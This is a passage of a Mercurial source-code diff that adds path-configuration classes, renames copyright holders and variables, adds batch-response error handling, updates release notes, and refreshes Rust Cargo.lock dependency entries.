+ clone_path, branch = parseurl(url, default_branches)
+ return url, clone_path, branch
+
+
+def parseurl(path, branches=None):
+ '''parse url#branch, returning (url, (branch, branches))'''
+ u = url(path)
+ branch = None
+ if u.fragment:
+ branch = u.fragment
+ u.fragment = None
+ return bytes(u), (branch, branches or [])
+
+
+class paths(dict):
+ """Represents a collection of paths and their configs.
+
+ Data is initially derived from ui instances and the config files they have
+ loaded.
+ """
+
+ def __init__(self, ui):
+ dict.__init__(self)
+
+ for name, loc in ui.configitems(b'paths', ignoresub=True):
+ # No location is the same as not existing.
+ if not loc:
+ continue
+ loc, sub_opts = ui.configsuboptions(b'paths', name)
+ self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts)
+
+ for name, p in sorted(self.items()):
+ p.chain_path(ui, self)
+
+ def getpath(self, ui, name, default=None):
+ """Return a ``path`` from a string, falling back to default.
+
+ ``name`` can be a named path or a location. Locations are filesystem
+ paths or URIs.
+
+ Returns None if ``name`` is not a registered path, a URI, or a local
+ path to a repo.
+ """
+ # Only fall back to default if no path was requested.
+ if name is None:
+ if not default:
+ default = ()
+ elif not isinstance(default, (tuple, list)):
+ default = (default,)
+ for k in default:
+ try:
+ return self[k]
+ except KeyError:
+ continue
+ return None
+
+ # Most likely empty string.
+ # This may need to raise in the future.
+ if not name:
+ return None
+
+ try:
+ return self[name]
+ except KeyError:
+ # Try to resolve as a local path or URI.
+ try:
+ # we pass the ui instance as warnings might need to be issued
+ return path(ui, None, rawloc=name)
+ except ValueError:
+ raise error.RepoError(_(b'repository %s does not exist') % name)
+
+
+_pathsuboptions = {}
+
+
+def pathsuboption(option, attr):
+ """Decorator used to declare a path sub-option.
+
+ Arguments are the sub-option name and the attribute it should set on
+ ``path`` instances.
+
+ The decorated function will receive as arguments a ``ui`` instance,
+ ``path`` instance, and the string value of this option from the config.
+ The function should return the value that will be set on the ``path``
+ instance.
+
+ This decorator can be used to perform additional verification of
+ sub-options and to change the type of sub-options.
+ """
+
+ def register(func):
+ _pathsuboptions[option] = (attr, func)
+ return func
+
+ return register
+
+
+@pathsuboption(b'pushurl', b'pushloc')
+def pushurlpathoption(ui, path, value):
+ u = url(value)
+ # Actually require a URL.
+ if not u.scheme:
+ ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
+ return None
+
+ # Don't support the #foo syntax in the push URL to declare branch to
+ # push.
+ if u.fragment:
+ ui.warn(
+ _(
+ b'("#fragment" in paths.%s:pushurl not supported; '
+ b'ignoring)\n'
+ )
+ % path.name
+ )
+ u.fragment = None
+
+ return bytes(u)
+
+
+@pathsuboption(b'pushrev', b'pushrev')
+def pushrevpathoption(ui, path, value):
+ return value
+
+
+class path(object):
+ """Represents an individual path and its configuration."""
+
+ def __init__(self, ui, name, rawloc=None, suboptions=None):
+ """Construct a path from its config options.
+
+ ``ui`` is the ``ui`` instance the path is coming from.
+ ``name`` is the symbolic name of the path.
+ ``rawloc`` is the raw location, as defined in the config.
+ ``pushloc`` is the raw location pushes should be made to.
+
+ If ``name`` is not defined, we require that the location be a) a local
+ filesystem path with a .hg directory or b) a URL. If not,
+ ``ValueError`` is raised.
+ """
+ if not rawloc:
+ raise ValueError(b'rawloc must be defined')
+
+ # Locations may define branches via syntax <base>#<branch>.
+ u = url(rawloc)
+ branch = None
+ if u.fragment:
+ branch = u.fragment
+ u.fragment = None
+
+ self.url = u
+ # the url from the config/command line before dealing with `path://`
+ self.raw_url = u.copy()
+ self.branch = branch
+
+ self.name = name
+ self.rawloc = rawloc
+ self.loc = b'%s' % u
+
+ self._validate_path()
+
+ _path, sub_opts = ui.configsuboptions(b'paths', b'*')
+ self._own_sub_opts = {}
+ if suboptions is not None:
+ self._own_sub_opts = suboptions.copy()
+ sub_opts.update(suboptions)
+ self._all_sub_opts = sub_opts.copy()
+
+ self._apply_suboptions(ui, sub_opts)
+
+ def chain_path(self, ui, paths):
+ if self.url.scheme == b'path':
+ assert self.url.path is None
+ try:
+ subpath = paths[self.url.host]
+ except KeyError:
+ m = _(b'cannot use `%s`, "%s" is not a known path')
+ m %= (self.rawloc, self.url.host)
+ raise error.Abort(m)
+ if subpath.raw_url.scheme == b'path':
+ m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
+ m %= (self.rawloc, self.url.host)
+ raise error.Abort(m)
+ self.url = subpath.url
+ self.rawloc = subpath.rawloc
+ self.loc = subpath.loc
+ if self.branch is None:
+ self.branch = subpath.branch
+ else:
+ base = self.rawloc.rsplit(b'#', 1)[0]
+ self.rawloc = b'%s#%s' % (base, self.branch)
+ suboptions = subpath._all_sub_opts.copy()
+ suboptions.update(self._own_sub_opts)
+ self._apply_suboptions(ui, suboptions)
+
+ def _validate_path(self):
+ # When given a raw location but not a symbolic name, validate the
+ # location is valid.
+ if (
+ not self.name
+ and not self.url.scheme
+ and not self._isvalidlocalpath(self.loc)
+ ):
+ raise ValueError(
+ b'location is not a URL or path to a local '
+ b'repo: %s' % self.rawloc
+ )
+
+ def _apply_suboptions(self, ui, sub_options):
+ # Now process the sub-options. If a sub-option is registered, its
+ # attribute will always be present. The value will be None if there
+ # was no valid sub-option.
+ for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
+ if suboption not in sub_options:
+ setattr(self, attr, None)
+ continue
+
+ value = func(ui, self, sub_options[suboption])
+ setattr(self, attr, value)
+
+ def _isvalidlocalpath(self, path):
+ """Returns True if the given path is a potentially valid repository.
+ This is its own function so that extensions can change the definition of
+ 'valid' in this case (like when pulling from a git repo into a hg
+ one)."""
+ try:
+ return os.path.isdir(os.path.join(path, b'.hg'))
+ # Python 2 may return TypeError. Python 3, ValueError.
+ except (TypeError, ValueError):
+ return False
+
+ @property
+ def suboptions(self):
+ """Return sub-options and their values for this path.
+
+ This is intended to be used for presentation purposes.
+ """
+ d = {}
+ for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
+ value = getattr(self, attr)
+ if value is not None:
+ d[subopt] = value
+ return d
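As a hypothetical illustration of what `chain_path` and the `pushurl` sub-option above enable, an hgrc `[paths]` section could look like this (names are made up):

    [paths]
    upstream = https://example.com/repo
    upstream.pushurl = ssh://example.com/repo
    # `path://upstream` reuses the `upstream` definition, including its
    # sub-options; chaining onto another `path://` entry is rejected
    mirror = path://upstream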
--- a/mercurial/verify.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/verify.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# verify.py - repository integrity checking for Mercurial
#
-# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -416,7 +416,7 @@
storefiles = set()
subdirs = set()
revlogv1 = self.revlogv1
- for f, f2, size in repo.store.datafiles():
+ for t, f, f2, size in repo.store.datafiles():
if not f:
self._err(None, _(b"cannot decode filename '%s'") % f2)
elif (size > 0 or not revlogv1) and f.startswith(b'meta/'):
@@ -480,7 +480,7 @@
ui.status(_(b"checking files\n"))
storefiles = set()
- for f, f2, size in repo.store.datafiles():
+ for rl_type, f, f2, size in repo.store.datafiles():
if not f:
self._err(None, _(b"cannot decode filename '%s'") % f2)
elif (size > 0 or not revlogv1) and f.startswith(b'data/'):
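The `datafiles()` change above (mirrored in wireprotov2server.py further down) widens each entry from a 3-tuple to a 4-tuple whose leading element tags the revlog type. A toy sketch of the new unpacking, with made-up values rather than the real store API:

    def datafiles():
        # stand-in for repo.store.datafiles() after the change
        yield (1, b'data/foo.i', b'data/foo.i', 1234)
        yield (2, b'meta/bar.i', b'meta/bar.i', 567)

    for rl_type, f, f2, size in datafiles():
        # rl_type can eventually drive dispatch instead of name prefixes
        # such as b'00changelog' (see the XXX note in wireprotov2server.py)
        print(rl_type, f, size)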
--- a/mercurial/vfs.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/vfs.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# vfs.py - Mercurial 'vfs' classes
#
-# Copyright Matt Mackall <mpm@selenic.com>
+# Copyright Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/win32.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/win32.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# win32.py - utility functions that use win32 API
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/windows.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/windows.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# windows.py - Windows utility function implementations for Mercurial
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/wireprotoserver.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/wireprotoserver.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,5 @@
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/wireprotov1peer.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/wireprotov1peer.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# wireprotov1peer.py - Client-side functionality for wire protocol version 1.
#
-# Copyright 2005-2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -43,14 +43,14 @@
@batchable
def sample(self, one, two=None):
# Build list of encoded arguments suitable for your wire protocol:
- encargs = [('one', encode(one),), ('two', encode(two),)]
+ encoded_args = [('one', encode(one),), ('two', encode(two),)]
# Create future for injection of encoded result:
- encresref = future()
+ encoded_res_future = future()
# Return encoded arguments and future:
- yield encargs, encresref
+ yield encoded_args, encoded_res_future
# Assuming the future to be filled with the result from the batched
# request now. Decode it:
- yield decode(encresref.value)
+ yield decode(encoded_res_future.value)
The decorator returns a function which wraps this coroutine as a plain
method, but adds the original method as an attribute called "batchable",
@@ -60,12 +60,12 @@
def plain(*args, **opts):
batchable = f(*args, **opts)
- encargsorres, encresref = next(batchable)
- if not encresref:
- return encargsorres # a local result in this case
+ encoded_args_or_res, encoded_res_future = next(batchable)
+ if not encoded_res_future:
+ return encoded_args_or_res # a local result in this case
self = args[0]
cmd = pycompat.bytesurl(f.__name__) # ensure cmd is ascii bytestr
- encresref.set(self._submitone(cmd, encargsorres))
+ encoded_res_future.set(self._submitone(cmd, encoded_args_or_res))
return next(batchable)
setattr(plain, 'batchable', f)
@@ -257,15 +257,15 @@
# Encoded arguments and future holding remote result.
try:
- encargsorres, fremote = next(batchable)
+ encoded_args_or_res, fremote = next(batchable)
except Exception:
pycompat.future_set_exception_info(f, sys.exc_info()[1:])
return
if not fremote:
- f.set_result(encargsorres)
+ f.set_result(encoded_args_or_res)
else:
- requests.append((command, encargsorres))
+ requests.append((command, encoded_args_or_res))
states.append((command, f, batchable, fremote))
if not requests:
@@ -310,7 +310,7 @@
if not f.done():
f.set_exception(
error.ResponseError(
- _(b'unfulfilled batch command response')
+ _(b'unfulfilled batch command response'), None
)
)
@@ -322,16 +322,27 @@
for command, f, batchable, fremote in states:
# Grab raw result off the wire and teach the internal future
# about it.
- remoteresult = next(wireresults)
- fremote.set(remoteresult)
+ try:
+ remoteresult = next(wireresults)
+ except StopIteration:
+ # This can happen in particular because next(batchable)
+ # in the previous iteration can call peer._abort, which
+ # may close the peer.
+ f.set_exception(
+ error.ResponseError(
+ _(b'unfulfilled batch command response'), None
+ )
+ )
+ else:
+ fremote.set(remoteresult)
- # And ask the coroutine to decode that value.
- try:
- result = next(batchable)
- except Exception:
- pycompat.future_set_exception_info(f, sys.exc_info()[1:])
- else:
- f.set_result(result)
+ # And ask the coroutine to decode that value.
+ try:
+ result = next(batchable)
+ except Exception:
+ pycompat.future_set_exception_info(f, sys.exc_info()[1:])
+ else:
+ f.set_result(result)
@interfaceutil.implementer(
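A toy emulation of the two-step batchable protocol whose variables are renamed above; this is a sketch of the coroutine contract, not the real peer machinery:

    class Future:
        value = None
        def set(self, value):
            self.value = value

    def sample_batchable(x):
        # first yield: encoded arguments plus a future for the raw result
        encoded_args = [('x', str(x))]
        encoded_res_future = Future()
        yield encoded_args, encoded_res_future
        # second yield: decode whatever the batcher injected into the future
        yield int(encoded_res_future.value) + 1

    g = sample_batchable(41)
    args, fut = next(g)  # the batcher would send `args` over the wire
    fut.set('41')        # ...and inject the raw response here
    print(next(g))       # 42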
--- a/mercurial/wireprotov1server.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/wireprotov1server.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# wireprotov1server.py - Wire protocol version 1 server functionality
#
-# Copyright 2005-2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -27,6 +27,7 @@
exchange,
pushkey as pushkeymod,
pycompat,
+ requirements as requirementsmod,
streamclone,
util,
wireprototypes,
@@ -108,7 +109,7 @@
4. server.bundle1
"""
ui = repo.ui
- gd = b'generaldelta' in repo.requirements
+ gd = requirementsmod.GENERALDELTA_REQUIREMENT in repo.requirements
if gd:
v = ui.configbool(b'server', b'bundle1gd.%s' % action)
@@ -310,7 +311,7 @@
caps.append(b'stream-preferred')
requiredformats = repo.requirements & repo.supportedformats
# if our local revlogs are just revlogv1, add 'stream' cap
- if not requiredformats - {b'revlogv1'}:
+ if not requiredformats - {requirementsmod.REVLOGV1_REQUIREMENT}:
caps.append(b'stream')
# otherwise, add 'streamreqs' detailing our local revlog format
else:
--- a/mercurial/wireprotov2server.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/wireprotov2server.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,5 @@
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -1582,7 +1582,8 @@
# TODO this is a bunch of storage layer interface abstractions because
# it assumes revlogs.
- for name, encodedname, size in topfiles:
+ for rl_type, name, encodedname, size in topfiles:
+ # XXX use the `rl_type` for that
if b'changelog' in files and name.startswith(b'00changelog'):
pass
elif b'manifestlog' in files and name.startswith(b'00manifest'):
--- a/mercurial/worker.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/worker.py Tue Apr 20 11:01:06 2021 -0400
@@ -442,7 +442,7 @@
we ever write workers that need to preserve grouping in input
we should consider allowing callers to specify a partition strategy.
- mpm is not a fan of this partitioning strategy when files are involved.
+ olivia is not a fan of this partitioning strategy when files are involved.
In her words:
Single-threaded Mercurial makes a point of creating and visiting
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/pyproject.toml Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,18 @@
+[build-system]
+requires = ["setuptools", "wheel"]
+build-backend = "setuptools.build_meta"
+
+[tool.black]
+line-length = 80
+exclude = '''
+build/
+| wheelhouse/
+| dist/
+| packages/
+| \.hg/
+| \.mypy_cache/
+| \.venv/
+| mercurial/thirdparty/
+'''
+skip-string-normalization = true
+quiet = true
--- a/relnotes/5.7 Thu Mar 25 19:06:28 2021 -0400
+++ b/relnotes/5.7 Tue Apr 20 11:01:06 2021 -0400
@@ -17,6 +17,8 @@
can be e.g. `rebase`. As part of this effort, the default format
from `hg rebase` was reorganized a bit.
+ * `hg purge` is now a core command using `--confirm` by default.
+
* `hg diff` and `hg extdiff` now support `--from <rev>` and `--to <rev>`
arguments as clearer alternatives to `-r <revs>`. `-r <revs>` has been
deprecated.
@@ -43,6 +45,9 @@
* The `branchmap` cache is updated more intelligently and can be
significantly faster for repositories with many branches and changesets.
+ * The `rev-branch-cache` is now updated incrementally whenever changesets
+ are added.
+
== New Experimental Features ==
@@ -64,4 +69,5 @@
== Internal API Changes ==
-
+ * `changelog.branchinfo` is deprecated and will be removed after 5.8.
+ It is superseded by `changelogrevision.branchinfo`.
--- a/relnotes/next Thu Mar 25 19:06:28 2021 -0400
+++ b/relnotes/next Tue Apr 20 11:01:06 2021 -0400
@@ -1,8 +1,24 @@
== New Features ==
+
+ * `hg purge` is now a core command using `--confirm` by default.
+
+ * The `rev-branch-cache` is now updated incrementally whenever changesets
+ are added.
+
+ * The new options `experimental.bundlecompthreads` and
+ `experimental.bundlecompthreads.<engine>` can be used to instruct
+ the compression engines for bundle operations to use multiple threads
+ for compression. The default is single-threaded operation. Currently
+ this is only supported for zstd.
== New Experimental Features ==
+ * There's a new `diff.merge` config option to show the changes
+ relative to an automerge for merge changesets. This makes it
+ easier to detect and review manual changes performed in merge
+ changesets. It is supported by `hg diff --change`, `hg log -p`,
+ `hg incoming -p`, and `hg outgoing -p` so far.
+
== Bug Fixes ==
@@ -10,7 +26,24 @@
== Backwards Compatibility Changes ==
+ * In normal repositories, the first parent of a changeset is not null,
+ unless both parents are null (like the first changeset). Some legacy
+ repositories violate this condition. The revlog code will now
+ silently swap the parents when this condition is detected. This can
+ change the output of `hg log` when explicitly asking for first or
+ second parent.
+
== Internal API Changes ==
+ * `changelog.branchinfo` is deprecated and will be removed after 5.8.
+ It is superseded by `changelogrevision.branchinfo`.
+
+ * Callbacks for revlog.addgroup and the changelog._nodeduplicatecallback hook
+ now get a revision number as argument instead of a node.
+
+ * revlog.addrevision returns the revision number instead of the node.
+
+ * `nodes.nullid` and related constants are being phased out as part of
+ the deprecation of SHA1. Repository instances and related classes
+ provide access via `nodeconstants` and in some cases `nullid` attributes.
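For reference, the experimental feature described above would be switched on with a config snippet along these lines (assuming a boolean value for `diff.merge`, as the note implies):

    [diff]
    merge = yes

`hg diff --change <merge-rev>` then shows only the changes relative to an automerge of the merge's parents.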
--- a/rust/Cargo.lock Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/Cargo.lock Tue Apr 20 11:01:06 2021 -0400
@@ -4,1009 +4,1101 @@
name = "adler"
version = "0.2.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ee2a4ec343196209d6594e19543ae87a39f96d5534d7174822a3ad825dd6ed7e"
[[package]]
name = "aho-corasick"
version = "0.7.15"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7404febffaa47dac81aa44dba71523c9d069b1bdc50a77db41195149e17f68e5"
dependencies = [
- "memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)",
+ "memchr",
]
[[package]]
name = "ansi_term"
version = "0.11.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ee49baf6cb617b853aa8d93bf420db2383fab46d314482ca2803b40d5fde979b"
dependencies = [
- "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)",
+ "winapi",
]
[[package]]
name = "atty"
version = "0.2.14"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d9b39be18770d11421cdb1b9947a45dd3f37e93092cbf377614828a319d5fee8"
dependencies = [
- "hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)",
+ "hermit-abi",
+ "libc",
+ "winapi",
]
[[package]]
name = "autocfg"
version = "1.0.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cdb031dd78e28731d87d56cc8ffef4a8f36ca26c38fe2de700543e627f8a464a"
[[package]]
name = "bitflags"
version = "1.2.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cf1de2fe8c75bc145a2f577add951f8134889b4795d47466a54a5c846d691693"
[[package]]
name = "bitmaps"
version = "2.1.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "031043d04099746d8db04daf1fa424b2bc8bd69d92b25962dcde24da39ab64a2"
dependencies = [
- "typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "typenum",
]
[[package]]
name = "byteorder"
version = "1.3.4"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "08c48aae112d48ed9f069b33538ea9e3e90aa263cfa3d1c24309612b1f7472de"
+
+[[package]]
+name = "bytes-cast"
+version = "0.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3196ba300c7bc9282a4331e878496cb3e9603a898a8f1446601317163e16ca52"
+dependencies = [
+ "bytes-cast-derive",
+]
+
+[[package]]
+name = "bytes-cast-derive"
+version = "0.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cb936af9de38476664d6b58e529aff30d482e4ce1c5e150293d00730b0d81fdb"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn",
+]
[[package]]
name = "cc"
version = "1.0.66"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4c0496836a84f8d0495758516b8621a622beb77c0fed418570e50764093ced48"
dependencies = [
- "jobserver 0.1.21 (registry+https://github.com/rust-lang/crates.io-index)",
+ "jobserver",
]
[[package]]
name = "cfg-if"
version = "0.1.10"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822"
[[package]]
name = "cfg-if"
version = "1.0.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd"
+
+[[package]]
+name = "chrono"
+version = "0.4.19"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "670ad68c9088c2a963aaa298cb369688cf3f9465ce5e2d4ca10e6e0098a1ce73"
+dependencies = [
+ "libc",
+ "num-integer",
+ "num-traits",
+ "time",
+ "winapi",
+]
[[package]]
name = "clap"
version = "2.33.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "37e58ac78573c40708d45522f0d80fa2f01cc4f9b4e2bf749807255454312002"
dependencies = [
- "ansi_term 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "atty 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)",
- "bitflags 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "strsim 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "textwrap 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)",
- "vec_map 0.8.2 (registry+https://github.com/rust-lang/crates.io-index)",
+ "ansi_term",
+ "atty",
+ "bitflags",
+ "strsim",
+ "textwrap",
+ "unicode-width",
+ "vec_map",
]
[[package]]
name = "const_fn"
version = "0.4.4"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cd51eab21ab4fd6a3bf889e2d0958c0a6e3a61ad04260325e919e652a2a62826"
[[package]]
name = "cpython"
-version = "0.4.1"
+version = "0.5.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0f11357af68648b6a227e7e2384d439cec8595de65970f45e3f7f4b2600be472"
dependencies = [
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)",
- "python27-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "python3-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "libc",
+ "num-traits",
+ "paste",
+ "python27-sys",
+ "python3-sys",
]
[[package]]
name = "crc32fast"
version = "1.2.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "81156fece84ab6a9f2afdb109ce3ae577e42b1228441eded99bd77f627953b1a"
dependencies = [
- "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cfg-if 1.0.0",
]
[[package]]
name = "crossbeam-channel"
version = "0.4.4"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b153fe7cbef478c567df0f972e02e6d736db11affe43dfc9c56a9374d1adfb87"
dependencies = [
- "crossbeam-utils 0.7.2 (registry+https://github.com/rust-lang/crates.io-index)",
- "maybe-uninit 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "crossbeam-utils 0.7.2",
+ "maybe-uninit",
]
[[package]]
name = "crossbeam-channel"
version = "0.5.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "dca26ee1f8d361640700bde38b2c37d8c22b3ce2d360e1fc1c74ea4b0aa7d775"
dependencies = [
- "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cfg-if 1.0.0",
+ "crossbeam-utils 0.8.1",
]
[[package]]
name = "crossbeam-deque"
version = "0.8.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "94af6efb46fef72616855b036a624cf27ba656ffc9be1b9a3c931cfc7749a9a9"
dependencies = [
- "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "crossbeam-epoch 0.9.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cfg-if 1.0.0",
+ "crossbeam-epoch",
+ "crossbeam-utils 0.8.1",
]
[[package]]
name = "crossbeam-epoch"
version = "0.9.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a1aaa739f95311c2c7887a76863f500026092fb1dce0161dab577e559ef3569d"
dependencies = [
- "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "const_fn 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)",
- "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "memoffset 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cfg-if 1.0.0",
+ "const_fn",
+ "crossbeam-utils 0.8.1",
+ "lazy_static",
+ "memoffset",
+ "scopeguard",
]
[[package]]
name = "crossbeam-utils"
version = "0.7.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c3c7c73a2d1e9fc0886a08b93e98eb643461230d5f1925e4036204d5f2e261a8"
dependencies = [
- "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)",
- "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "autocfg",
+ "cfg-if 0.1.10",
+ "lazy_static",
]
[[package]]
name = "crossbeam-utils"
version = "0.8.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "02d96d1e189ef58269ebe5b97953da3274d83a93af647c2ddd6f9dab28cedb8d"
dependencies = [
- "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "autocfg",
+ "cfg-if 1.0.0",
+ "lazy_static",
]
[[package]]
name = "ctor"
version = "0.1.16"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7fbaabec2c953050352311293be5c6aba8e141ba19d6811862b232d6fd020484"
dependencies = [
- "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)",
- "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)",
+ "quote",
+ "syn",
+]
+
+[[package]]
+name = "derive_more"
+version = "0.99.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "41cb0e6161ad61ed084a36ba71fbba9e3ac5aee3606fb607fe08da6acbcf3d8c"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn",
]
[[package]]
name = "difference"
version = "2.0.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "524cbf6897b527295dff137cec09ecf3a05f4fddffd7dfcd1585403449e74198"
[[package]]
name = "either"
version = "1.6.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457"
[[package]]
name = "env_logger"
version = "0.7.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "44533bbbb3bb3c1fa17d9f2e4e38bbbaf8396ba82193c4cb1b6445d711445d36"
dependencies = [
- "atty 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)",
- "humantime 1.3.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)",
- "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)",
- "termcolor 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)",
+ "atty",
+ "humantime",
+ "log",
+ "regex",
+ "termcolor",
]
[[package]]
name = "flate2"
version = "1.0.19"
source = "registry+https://github.com/rust-lang/crates.io-index"
